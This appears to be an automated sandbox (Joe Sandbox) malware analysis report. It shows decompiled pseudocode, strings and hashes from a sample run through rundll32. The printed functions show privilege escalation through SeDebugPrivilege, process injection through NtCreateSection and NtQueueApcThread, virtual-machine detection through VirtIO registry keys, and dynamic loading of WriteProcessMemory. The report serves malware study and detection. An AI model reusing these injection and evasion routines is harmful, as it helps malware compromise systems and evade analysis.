				E00000215215205F9940(_t146, _t21, 0x2066b800, __r9, _t178);
				if ( *((intOrPtr*)(_t195 + 8)) + 2 - 0xffff <= 0) goto 0x205a074a;
				 *((long long*)(_t185 - 0x59)) = 0x206278d0;
				 *((long long*)(_t185 - 0x51)) = 0x206278d0;
				 *((long long*)(_t185 - 0x49)) = 0x206278d0;
				 *(_t185 - 0x69) = "field value too large";
				 *(_t185 - 0x61) = 1;
				_t28 = _t185 - 0x51; // -78
				_t29 = _t185 - 0x69; // -102
				E00000215215205F7764(_t146, _t29, _t28, _t178, _t182);
				 *((long long*)(_t185 - 0x59)) = 0x20627910;
				 *((long long*)(_t185 - 0x59)) = 0x20627940;
				 *((long long*)(_t185 - 0x39)) = "D:\\Sources\\boost_1_78_0\\boost/beast/http/impl/fields.hpp";
				_t139 = "struct boost::beast::http::basic_fields<class std::allocator<char> >::element &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char> >,class boost::basic_string_view<char,struct std::char_traits<char> >)";
				 *(_t185 - 0x31) = _t139;
				 *((long long*)(_t185 - 0x29)) = 0x3cd;
				_t35 = _t185 - 0x39; // -54
				_t36 = _t185 - 0x59; // -86
				_t37 = _t185 - 0x19; // -22
				E000002152152059FCD0(_t146, _t37, _t36, _t182, _t35, _t181, _t184);
				_t38 = _t185 - 0x19; // -22
				_t159 = _t38;
				E00000215215205F9940(_t146, _t159, 0x2066b800, _t182);
				asm("inc ecx");
				asm("dec ax");
				asm("psrldq xmm0, 0x8");
				asm("dec ax");
				_t173 = _t159 + _t139;
				if (_t139 == _t173) goto 0x205a07ab;
				_t97 =  *_t139 & 0x000000ff;
				if (_t97 == 0x20) goto 0x205a0775;
				if (_t97 != 9) goto 0x205a077a;
				_t140 =  &(_t139[1]);
				goto 0x205a0763;
				if (_t140 == _t173) goto 0x205a07ab;
				_t40 = _t173 - 1; // 0x8e
				_t193 = _t40;
				_t98 =  *_t193 & 0x000000ff;
				if (_t98 == 0x20) goto 0x205a0791;
				if (_t98 != 9) goto 0x205a0799;
				_t174 = _t193;
				goto 0x205a077d;
				if (_t140 == _t174) goto 0x205a07ab;
				 *(_t185 - 0x69) = _t140;
				 *(_t185 - 0x61) = _t174 - _t140;
				goto 0x205a07b3;
				 *(_t185 - 0x69) = _t178;
				 *(_t185 - 0x61) = _t178;
				asm("movups xmm0, [ebp-0x69]");
				asm("inc ecx");
				_t162 = _t159 + 0x41 +  *((intOrPtr*)(_t197 + 8)) >> 3;
				if (_t162 != 0) goto 0x205a07e0;
				goto 0x205a081e;
				_t163 = _t162 * 8;
				if (_t163 - 0x1000 < 0) goto 0x205a0816;
				_t142 = _t163 + 0x27;
				if (_t142 - _t163 > 0) goto 0x205a0800;
				E00000215215205F5BBC(_t96, _t104, _t142 - _t163, _t142, _t178, _t178);
				asm("int3");
				_t164 = _t142;
				E00000215215205F4DCC(_t142, _t164);
				_t49 = _t142 + 0x27; // 0x27
				 *((long long*)((_t49 & 0xffffffe0) - 8)) = _t142;
				goto 0x205a081e;
				E00000215215205F4DCC(_t142, _t164);
				_t150 = _t142;
				 *((long long*)(_t185 + 0x67)) = _t150;
				 *((long long*)(_t185 + 0x77)) = _t150;
				if (_t150 == 0) goto 0x205a08c9;
				asm("movups xmm1, [esi]");
				asm("movaps [ebp-0x59], xmm1");
				asm("inc ecx");
				asm("movaps [ebp-0x69], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("dec cx");
				 *(_t150 + 0x30) =  &(_t193[2]) & 0x0000ffff;
				asm("psrldq xmm1, 0x8");
				asm("dec ax");
				 *((short*)(_t150 + 0x32)) = __esi;
				 *((intOrPtr*)(_t150 + 0x34)) = r15w;
				_t57 = _t150 + 0x38; // 0x5f
				_t179 = _t57;
				 *((char*)(_t142 + _t179)) = 0x3a;
				 *((char*)(_t142 + _t179)) = 0x20;
				_t143 = _t142 + _t179;
				 *((char*)(_t164 + _t143)) = 0xd;
				 *((char*)(_t164 + _t143 + _t179 + 1)) = 0xa;
				if (_t193 == 0) goto 0x205a08af;
				E00000215215205F7310( *(_t150 + 0x30) & 0x0000ffff, 0, __esi, _t107, _t179,  *(_t185 - 0x69), _t179, _t182, _t193);
				if (_t182 == 0) goto 0x205a08cc;
				_t95 = E00000215215205F7310( *(_t150 + 0x30) & 0x0000ffff, 0, __esi, _t107, _t179 + _t179,  *((intOrPtr*)(_t185 - 0x59)), _t179, _t182, _t182);
				goto 0x205a08cc;
				return _t95;
			}

































                0x215205a05e0
                0x215205a05e0
                0x215205a05e0
                0x215205a05e0
                0x215205a05ec
                0x215205a05f8
                0x215205a0600
                0x215205a0608
                0x215205a060b
                0x215205a060e
                0x215205a0620
                0x215205a062d
                0x215205a0633
                0x215205a0637
                0x215205a0642
                0x215205a0646
                0x215205a064a
                0x215205a064e
                0x215205a0652
                0x215205a065f
                0x215205a066a
                0x215205a0675
                0x215205a0680
                0x215205a0684
                0x215205a068c
                0x215205a0690
                0x215205a0694
                0x215205a0698
                0x215205a06a4
                0x215205a06a8
                0x215205a06bc
                0x215205a06c9
                0x215205a06cf
                0x215205a06d3
                0x215205a06de
                0x215205a06e2
                0x215205a06e6
                0x215205a06ea
                0x215205a06ee
                0x215205a06fb
                0x215205a0706
                0x215205a0711
                0x215205a0715
                0x215205a071c
                0x215205a0720
                0x215205a0728
                0x215205a072c
                0x215205a0730
                0x215205a0734
                0x215205a0740
                0x215205a0740
                0x215205a0744
                0x215205a074a
                0x215205a074e
                0x215205a0753
                0x215205a0758
                0x215205a075d
                0x215205a0766
                0x215205a0768
                0x215205a076e
                0x215205a0773
                0x215205a0775
                0x215205a0778
                0x215205a077d
                0x215205a077f
                0x215205a077f
                0x215205a0783
                0x215205a078a
                0x215205a078f
                0x215205a0791
                0x215205a0797
                0x215205a079c
                0x215205a07a1
                0x215205a07a5
                0x215205a07a9
                0x215205a07ab
                0x215205a07af
                0x215205a07b3
                0x215205a07b7
                0x215205a07d2
                0x215205a07d9
                0x215205a07de
                0x215205a07e0
                0x215205a07ef
                0x215205a07f1
                0x215205a07f8
                0x215205a07fa
                0x215205a07ff
                0x215205a0800
                0x215205a0803
                0x215205a0808
                0x215205a0810
                0x215205a0814
                0x215205a0816
                0x215205a081b
                0x215205a081e
                0x215205a0822
                0x215205a0829
                0x215205a082f
                0x215205a0832
                0x215205a0836
                0x215205a083a
                0x215205a083e
                0x215205a0843
                0x215205a084f
                0x215205a0853
                0x215205a0858
                0x215205a085d
                0x215205a0861
                0x215205a0866
                0x215205a0866
                0x215205a086f
                0x215205a087b
                0x215205a0887
                0x215205a088a
                0x215205a0899
                0x215205a08a1
                0x215205a08aa
                0x215205a08b9
                0x215205a08c2
                0x215205a08c7
                0x215205a08e5

                APIs
                Strings
                • struct boost::beast::http::basic_fields<class std::allocator<char> >::element &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char> >, xrefs: 00000215205A0679, 00000215205A0715
                • field value too large, xrefs: 00000215205A06D7
                • field name too large, xrefs: 00000215205A063B
                • D:\Sources\boost_1_78_0\boost/beast/http/impl/fields.hpp, xrefs: 00000215205A066E, 00000215205A070A
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception$Throw__std_exception_copy$Concurrency::cancel_current_taskFileHeaderRaisestd::bad_alloc::bad_alloc
                • String ID: D:\Sources\boost_1_78_0\boost/beast/http/impl/fields.hpp$field name too large$field value too large$struct boost::beast::http::basic_fields<class std::allocator<char> >::element &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char> >
                • API String ID: 4177371363-3821157088
                • Opcode ID: b5c6b7291967ff78ddf1fb764eec95435b1af2d7f8bf929ea062b2a5d0d25207
                • Instruction ID: 4d53998d6f62f14de6e3ead478678346cf7ce46251d758fb91a7f6284c551498
                • Opcode Fuzzy Hash: b5c6b7291967ff78ddf1fb764eec95435b1af2d7f8bf929ea062b2a5d0d25207
                • Instruction Fuzzy Hash: 04919A33B12FA1D9EB10CBA4E4483EC33F6EFA4758F405566DE4C26799EA389195C380
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205C7540 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 57libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressCloseHandleProc$CurrentLibraryLoadLookupPrivilegeProcessValue
                • String ID: AdjustTokenPrivileges$Advapi32.dll$OpenProcessToken$SeDebugPrivilege
                • API String ID: 1752774111-261832459
                • Opcode ID: feb6192630000d6d9ed8c5f6f6389c402362fe7abc154ea2706b159974cd1c3a
                • Instruction ID: 8a2e9f38fe2b745b13166917ea794423e73b92d4817b0b6cbe43d0b956a30ed5
                • Opcode Fuzzy Hash: feb6192630000d6d9ed8c5f6f6389c402362fe7abc154ea2706b159974cd1c3a
                • Instruction Fuzzy Hash: 42211973216F40C6DB54CB61F84869AB3A0FBD8B94F50406AEE8E43B6CDE78D548CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CAB8C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 96libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 27%
                			E00000215215205CAB8C(intOrPtr __ecx, long long* __rax, long long __rbx, long long* __rdx, long long __rdi, long long __rsi, long long* __r8, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				intOrPtr _v64;
				long long _v72;
				long long _v80;
				intOrPtr _v88;
				void* _v96;
				long long _v104;
				long long _v120;
				intOrPtr _v128;
				intOrPtr _v136;
				void* __rbp;
				intOrPtr _t38;
				void* _t43;
				void* _t54;
				intOrPtr _t55;
				void* _t57;
				long long* _t63;
				void* _t89;
				long long* _t98;
				long long* _t99;

				_t86 = __rsi;
				_t64 = __rbx;
				_t63 = __rax;
				_t49 = __ecx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t99 = __r8;
				_t98 = __rdx;
				_a32 = __rbx;
				_t55 = __ecx;
				_v96 = __rbx;
				_v88 = 0;
				_t7 = _t64 + 0x28; // 0x28
				r8d = _t7;
				E00000215215205F8EF0(__ecx, 0, _t54, _t57,  &_v80, __rdx, __rdi, __r8);
				_v104 = __rbx;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				_v104 = _t55;
				_v88 = 0x30;
				_v120 = __rsi;
				asm("xorps xmm0, xmm0");
				_v128 = 0x8000000;
				_v80 = __rsi;
				_t17 = _t86 + 0x40; // 0x40
				_t38 = _t17;
				_v72 = __rsi;
				_v64 = _t38;
				_v136 = _t38;
				asm("movdqu [ebp-0x10], xmm0");
				if ( *_t63() < 0) goto 0x205cacaa;
				GetCurrentProcess();
				if (E00000215215205CAA5C(_t63, _t63, _a32, _t63, _t89,  &_v96) != 0) goto 0x205cacb1;
				r8d = _v104;
				E00000215215205F8EF0(_t49, 0, _t54, _t57, _v96, _t63, _t63,  &_v96);
				 *_t98 = _v96;
				if (_t99 == 0) goto 0x205cacb1;
				 *_t99 = _a32;
				goto 0x205cacb5;
				_t43 =  *_t63();
				if (_a32 == 0) goto 0x205cacc2;
				if (_t99 != 0) goto 0x205cacc2;
				 *_t63();
				return _t43;
			}























                0x215205cab8c
                0x215205cab8c
                0x215205cab8c
                0x215205cab8c
                0x215205cab8c
                0x215205cab91
                0x215205cab96
                0x215205cabb0
                0x215205cabb3
                0x215205cabb6
                0x215205cabba
                0x215205cabbc
                0x215205cabc2
                0x215205cabc5
                0x215205cabc5
                0x215205cabcd
                0x215205cabd9
                0x215205cabdd
                0x215205cabf0
                0x215205cac03
                0x215205cac16
                0x215205cac1c
                0x215205cac25
                0x215205cac2f
                0x215205cac34
                0x215205cac37
                0x215205cac43
                0x215205cac47
                0x215205cac47
                0x215205cac4a
                0x215205cac53
                0x215205cac5a
                0x215205cac5e
                0x215205cac67
                0x215205cac69
                0x215205cac83
                0x215205cac85
                0x215205cac8f
                0x215205cac98
                0x215205cac9f
                0x215205caca5
                0x215205caca8
                0x215205cacac
                0x215205cacb8
                0x215205cacbd
                0x215205cacbf
                0x215205cace4

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModule$CurrentProcess
                • String ID: 0$NtCreateSection$RtlNtStatusToDosError$ZwClose$ntdll.dll
                • API String ID: 1077269151-3111467594
                • Opcode ID: 16a1abb4dc548e0d1cc2f6da75aa4cf92c6f4bc6f3588bd7fbc56282c6eca6d6
                • Instruction ID: 069878c7f5128f07750288dc17d1482df866318365342ffa6ab586dd5ade231c
                • Opcode Fuzzy Hash: 16a1abb4dc548e0d1cc2f6da75aa4cf92c6f4bc6f3588bd7fbc56282c6eca6d6
                • Instruction Fuzzy Hash: 18413C33B12B21CAE750DF62E8486D93BB4FB98B98F644126EE4A53B48DF35C845C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CF2F0 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 61registryCOMMON
                Download Yara Rule
                C-Code - Quality: 61%
                			E00000215215205CF2F0(void* __eflags, signed int __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				void* _v8;
				signed int _v24;
				char _v536;
				long long _v544;
				long long _v552;
				long long _v560;
				long long _v568;
				long long _v576;
				long long _v584;
				long long _v592;
				char _v600;
				long long _v616;
				void* __rdi;
				void* _t32;
				void* _t35;
				void* _t37;
				signed long long _t42;
				void* _t63;
				void* _t67;
				signed long long _t68;
				void* _t70;

				_a8 = __rbx;
				_a16 = __rsi;
				_t68 = _t67 - 0x280;
				_t42 =  *0x2067c720; // 0xca1645d940e
				_v24 = _t42 ^ _t68;
				_v592 = L"SYSTEM\\ControlSet001\\Services\\vioscsi";
				_v584 = L"SYSTEM\\ControlSet001\\Services\\viostor";
				_v576 = L"SYSTEM\\ControlSet001\\Services\\VirtIO-FS Service";
				_v568 = L"SYSTEM\\ControlSet001\\Services\\VirtioSerial";
				_v560 = L"SYSTEM\\ControlSet001\\Services\\BALLOON";
				_v552 = L"SYSTEM\\ControlSet001\\Services\\BalloonService";
				_v544 = L"SYSTEM\\ControlSet001\\Services\\netkvm";
				r8d = 0x200;
				E00000215215205F8EF0(_t32, 0, _t35, _t37,  &_v536, __rdx, _t63, _t70);
				E00000215215205CD1D0(_t32, L"SYSTEM\\ControlSet001\\Services\\netkvm",  &_v536, __rdx, L"Checking reg key %s ",  *((intOrPtr*)(_t68 + 0x38 + __rbx * 8)));
				_v600 = __rsi;
				r9d = 0x20019;
				_v616 =  &_v600;
				r8d = 0;
				if (RegOpenKeyExW(??, ??, ??, ??, ??) == 0) goto 0x205cf3d9;
				if (__rbx + 1 - 7 < 0) goto 0x205cf370;
				goto 0x205cf3e9;
				RegCloseKey(??);
				return E00000215215205F59D0(_t32, _v24 ^ _t68,  *((intOrPtr*)(_t68 + 0x38 + __rbx * 8)),  *((intOrPtr*)(_t68 + 0x38 + __rbx * 8)));
			}
























                0x215205cf2f0
                0x215205cf2f5
                0x215205cf2fb
                0x215205cf302
                0x215205cf30c
                0x215205cf31d
                0x215205cf32b
                0x215205cf337
                0x215205cf343
                0x215205cf34f
                0x215205cf35b
                0x215205cf367
                0x215205cf377
                0x215205cf37d
                0x215205cf39b
                0x215205cf3a5
                0x215205cf3aa
                0x215205cf3b0
                0x215205cf3b5
                0x215205cf3ca
                0x215205cf3d3
                0x215205cf3d7
                0x215205cf3de
                0x215205cf40d

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpen
                • String ID: Checking reg key %s $SYSTEM\ControlSet001\Services\BALLOON$SYSTEM\ControlSet001\Services\BalloonService$SYSTEM\ControlSet001\Services\VirtIO-FS Service$SYSTEM\ControlSet001\Services\VirtioSerial$SYSTEM\ControlSet001\Services\netkvm$SYSTEM\ControlSet001\Services\vioscsi$SYSTEM\ControlSet001\Services\viostor
                • API String ID: 47109696-2595593112
                • Opcode ID: 8af4a12c27319ba11f01b608c6b82ca4e8bae16d677a2041f257da2fc04e1624
                • Instruction ID: 5da5372c956a2b13178e3ebba1aa92c4702f050db94120b2411fb86c8a8b5bd5
                • Opcode Fuzzy Hash: 8af4a12c27319ba11f01b608c6b82ca4e8bae16d677a2041f257da2fc04e1624
                • Instruction Fuzzy Hash: 0F314D37216FA0D5E6608B11F4882CA73A8FBD8794F604166EE8E47B68DF38D105CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205C9E18 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 190COMMON
                Download Yara Rule
                C-Code - Quality: 27%
                			E00000215215205C9E18(long long __rbx, void* __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, void* _a16, long long _a24, intOrPtr _a40) {
				long long _v64;
				void* _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				signed int _v120;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t65;
				intOrPtr _t69;
				char _t70;
				void* _t71;
				intOrPtr _t93;
				void* _t95;
				void* _t106;
				long long _t112;
				signed long long _t115;
				long long* _t119;
				long long _t120;
				intOrPtr* _t128;
				void* _t148;
				long long _t154;
				long long _t157;
				intOrPtr _t158;
				void* _t160;
				long long _t168;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t179;

				_t170 = __r9;
				_t120 = __rbx;
				_a8 = __rbx;
				_a24 = __r8;
				_a16 = __rdx;
				_t112 =  *((intOrPtr*)(__rcx + 8));
				_v96 = __rdx;
				_t179 = __rcx;
				_t172 = __r9;
				_a16 = __rdx;
				_v104 = __rdx;
				r12d =  *((intOrPtr*)(__rcx + 0x24));
				_v72 = __rdx;
				_v80 = __rdx;
				_v88 = __rdx;
				_v64 = _t112;
				_a40 =  *((intOrPtr*)(__rcx + 0x14));
				if (_t112 != 0) goto 0x205c9e7c;
				goto 0x205ca0b6;
				_t113 =  *0x20674e7c;
				r14d =  *( *0x20674e7c + "is program cannot be run in DOS mode.\r\r\n$");
				r14d = r14d + 0xfff;
				r14d = r14d & 0xfffff000;
				if (E00000215215205CAB8C(_t173 + 0x2578,  *0x20674e7c, __rbx,  &_v96, _t154, _t157,  &_v80) != 0) goto 0x205ca069;
				if (E00000215215205CAA5C( *0x20674e7c, _t120, _v80, _t172, _t160,  &_a16) != 0) goto 0x205ca069;
				r9d = 0;
				_v120 = _v120 & 0;
				if (E00000215215205CACE8(0,  *0x20674e7c, _t120, _v96, 0x20674e40, _t157, _t160, _a16, _t170, _t171) != 0) goto 0x205ca069;
				_t93 = _a40;
				r12d =  ==  ? _t93 : r12d;
				_t65 = E00000215215205CAB8C(r12d, _t113, _t120,  &_v104, _t154, _t157,  &_v88);
				_t158 = _v88;
				if (_t65 != 0) goto 0x205ca065;
				_t168 =  &_v72;
				if (E00000215215205CAA5C(_t113, _t120, _t158, _t172, _t160, _t168) != 0) goto 0x205ca065;
				r8d = _t93;
				E00000215215205F7310(r12d, _t93, 0, _t95, _v104, _v64, _v104, _t158, _t168);
				_t128 = _t179 + 0x28;
				r8d = 0;
				r13d = r14d;
				_t175 = _v96 + _t172;
				 *((long long*)(_t175 + 0x150)) = _a16;
				 *((long long*)(_t175 + 0x28)) = _t168;
				_t115 = _v72;
				 *(_t175 + 0x30) = _t115;
				 *((intOrPtr*)(_t175 + 0x40)) =  *((intOrPtr*)(_t179 + 0x18));
				 *((intOrPtr*)(_t175 + 0x38)) = r8d;
				 *((intOrPtr*)(_t175 + 0x3c)) = r12d;
				_t69 =  *((intOrPtr*)(_t179 + 0x1c));
				 *((intOrPtr*)(_t175 + 0x44)) = _t69;
				if ( *((intOrPtr*)(_t128 + (_t115 | 0xffffffff) + 1)) != r8b) goto 0x205c9f91;
				if (_t69 == 0) goto 0x205c9fb1;
				_t148 = _t175 + 0x50 - _t128;
				_t70 =  *_t128;
				 *((char*)(_t148 + _t128)) = _t70;
				if (_t70 != 0) goto 0x205c9fa5;
				_t71 = E00000215215205C9CF0((_t115 | 0xffffffff) + 1, _t120, _t175, _t158);
				_t106 = _t71;
				if (_t106 != 0) goto 0x205ca069;
				_t50 = _t148 + 0x40; // 0x80
				r8d = _t50;
				asm("movups xmm0, [ecx]");
				asm("movups [eax], xmm0");
				asm("movups xmm1, [ecx+0x10]");
				asm("movups [eax+0x10], xmm1");
				asm("movups xmm0, [ecx+0x20]");
				asm("movups [eax+0x20], xmm0");
				asm("movups xmm1, [ecx+0x30]");
				asm("movups [eax+0x30], xmm1");
				asm("movups xmm0, [ecx+0x40]");
				asm("movups [eax+0x40], xmm0");
				asm("movups xmm1, [ecx+0x50]");
				asm("movups [eax+0x50], xmm1");
				asm("movups xmm0, [ecx+0x60]");
				asm("movups [eax+0x60], xmm0");
				_t119 = _t175 + 0x168 + _t168;
				asm("movups xmm1, [ecx+0x70]");
				asm("movups [eax-0x10], xmm1");
				if (_t106 != 0) goto 0x205c9fd8;
				GetModuleHandleW(??);
				if (_t119 == 0) goto 0x205ca069;
				GetProcAddress(??, ??);
				_v120 = _v120 & 0x00000000;
				r9d = 0;
				 *_t119();
				goto 0x205ca069;
				if (_v96 == 0) goto 0x205ca083;
				GetCurrentProcess();
				E00000215215205CAB18();
				if (_v80 == 0) goto 0x205ca092;
				CloseHandle(??);
				if (_v104 == 0) goto 0x205ca0a8;
				GetCurrentProcess();
				E00000215215205CAB18();
				if (_t158 == 0) goto 0x205ca0b6;
				CloseHandle(??);
				return _t71;
			}




































                0x215205c9e18
                0x215205c9e18
                0x215205c9e18
                0x215205c9e1d
                0x215205c9e22
                0x215205c9e39
                0x215205c9e3f
                0x215205c9e43
                0x215205c9e49
                0x215205c9e4c
                0x215205c9e52
                0x215205c9e58
                0x215205c9e5c
                0x215205c9e60
                0x215205c9e64
                0x215205c9e68
                0x215205c9e6c
                0x215205c9e72
                0x215205c9e77
                0x215205c9e7c
                0x215205c9e92
                0x215205c9e96
                0x215205c9e9d
                0x215205c9eb4
                0x215205c9ece
                0x215205c9ee3
                0x215205c9ee6
                0x215205c9ef3
                0x215205c9ef9
                0x215205c9f07
                0x215205c9f0e
                0x215205c9f13
                0x215205c9f1b
                0x215205c9f21
                0x215205c9f34
                0x215205c9f3e
                0x215205c9f48
                0x215205c9f51
                0x215205c9f55
                0x215205c9f58
                0x215205c9f5f
                0x215205c9f62
                0x215205c9f69
                0x215205c9f6d
                0x215205c9f71
                0x215205c9f79
                0x215205c9f7d
                0x215205c9f81
                0x215205c9f85
                0x215205c9f89
                0x215205c9f98
                0x215205c9f9c
                0x215205c9fa2
                0x215205c9fa5
                0x215205c9fa7
                0x215205c9faf
                0x215205c9fb4
                0x215205c9fbb
                0x215205c9fbd
                0x215205c9fc6
                0x215205c9fc6
                0x215205c9fd8
                0x215205c9fdb
                0x215205c9fde
                0x215205c9fe2
                0x215205c9fe6
                0x215205c9fea
                0x215205c9fee
                0x215205c9ff2
                0x215205c9ff6
                0x215205c9ffa
                0x215205c9ffe
                0x215205ca002
                0x215205ca006
                0x215205ca00a
                0x215205ca00e
                0x215205ca011
                0x215205ca018
                0x215205ca020
                0x215205ca030
                0x215205ca039
                0x215205ca045
                0x215205ca056
                0x215205ca05b
                0x215205ca061
                0x215205ca063
                0x215205ca070
                0x215205ca072
                0x215205ca07e
                0x215205ca08a
                0x215205ca08c
                0x215205ca095
                0x215205ca097
                0x215205ca0a3
                0x215205ca0ab
                0x215205ca0b0
                0x215205ca0cf

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: NtQueueApcThread$is program cannot be run in DOS mode.$$ntdll.dll
                • API String ID: 0-1695160815
                • Opcode ID: 72dd9db284d4b49726d962a1c0c1ae00b7df737b2805ddc23eb7aca9e6c6e65f
                • Instruction ID: 437e12982ba2bf52c2ca0f074d6214f6dbee9d127a19d5c0d0aa1a2bafed5588
                • Opcode Fuzzy Hash: 72dd9db284d4b49726d962a1c0c1ae00b7df737b2805ddc23eb7aca9e6c6e65f
                • Instruction Fuzzy Hash: 6F81AE73B02F61CAEB11CF6998486EC3BA4FBA8BACF109155EE0853759EB35D585C340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060DCCC Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E000002152152060DCCC(void* __edx, char* __r8, void* __r9) {
				void* _t7;
				signed long long _t11;
				signed long long _t12;
				void* _t16;
				void* _t18;

				_t17 = _t18 - 0x4f;
				_t19 = _t18 - 0xc0;
				_t11 =  *0x2067c720; // 0xca1645d940e
				_t12 = _t11 ^ _t18 - 0x000000c0;
				 *(_t18 - 0x4f + 0x3f) = _t12;
				if (__r9 - _t12 + 4 >= 0) goto 0x2060dd18;
				 *__r8 = 0;
				return E00000215215205F59D0(_t7,  *(_t17 + 0x3f) ^ _t19, _t16, __r8);
			}








                0x2152060dcce
                0x2152060dcd3
                0x2152060dcda
                0x2152060dce1
                0x2152060dce4
                0x2152060dcf8
                0x2152060dcfa
                0x2152060dd17

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                • API String ID: 3215553584-2617248754
                • Opcode ID: 4cb90ac43a2d371ea456af3117a8e3444dba1b3e1e03e2e308f5dc0d4b1960e1
                • Instruction ID: 00bc1c97df67c10cadf34163beebdbf2a3a6654af730083f52334ebfee34d1bb
                • Opcode Fuzzy Hash: 4cb90ac43a2d371ea456af3117a8e3444dba1b3e1e03e2e308f5dc0d4b1960e1
                • Instruction Fuzzy Hash: 60418D72702F64C9EB24CF25E8457CA33A5FB69798F104266EE5807B99DA39D025C340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205C7630 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 66libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModuleProtectVirtual
                • String ID: SleepEx$UD3"$WriteProcessMemory$kernel32.dll
                • API String ID: 2492872976-2122506030
                • Opcode ID: 651551820492fda76c1d478d2c51d60894c219e5e0759cfa3eb3978a16a51996
                • Instruction ID: 1d6858da6c3bd72e80ae7d9078875cbee802dcedb09b1fcd84cd34b4ae26e909
                • Opcode Fuzzy Hash: 651551820492fda76c1d478d2c51d60894c219e5e0759cfa3eb3978a16a51996
                • Instruction Fuzzy Hash: DD218972B12A20CDEB20CF62E8086DD3B64F7A9BD8F540125DE4C17B58EB38C6858B40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205C9CF0 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 65COMMON
                Download Yara Rule
                C-Code - Quality: 33%
                			E00000215215205C9CF0(long long __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
				void* _t16;
				void* _t17;
				void* _t18;
				long long _t27;
				long long _t29;
				void* _t44;
				void* _t51;
				void* _t52;

				_t27 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_t16 =  *0x206832d0 - _t44; // 0x0
				if (_t16 == 0) goto 0x205c9d23;
				_t17 =  *0x206832d8 - _t44; // 0x0
				if (_t17 == 0) goto 0x205c9d23;
				_t18 =  *0x206832e0 - _t44; // 0x0
				if (_t18 != 0) goto 0x205c9de4;
				GetModuleHandleW(??);
				_t29 = __rax;
				if (__rax == 0) goto 0x205c9e06;
				GetModuleHandleW(??);
				if (__rax == 0) goto 0x205c9e06;
				E00000215215205CA2DC(__rax, __rax, __rax, "LdrLoadDll", _t51, _t52);
				 *0x206832d0 = _t27;
				if (_t27 == 0) goto 0x205c9e06;
				E00000215215205CA2DC(_t27, _t29, _t29, "LdrGetProcedureAddress", _t51, _t52);
				 *0x206832d8 = _t27;
				if (_t27 == 0) goto 0x205c9e06;
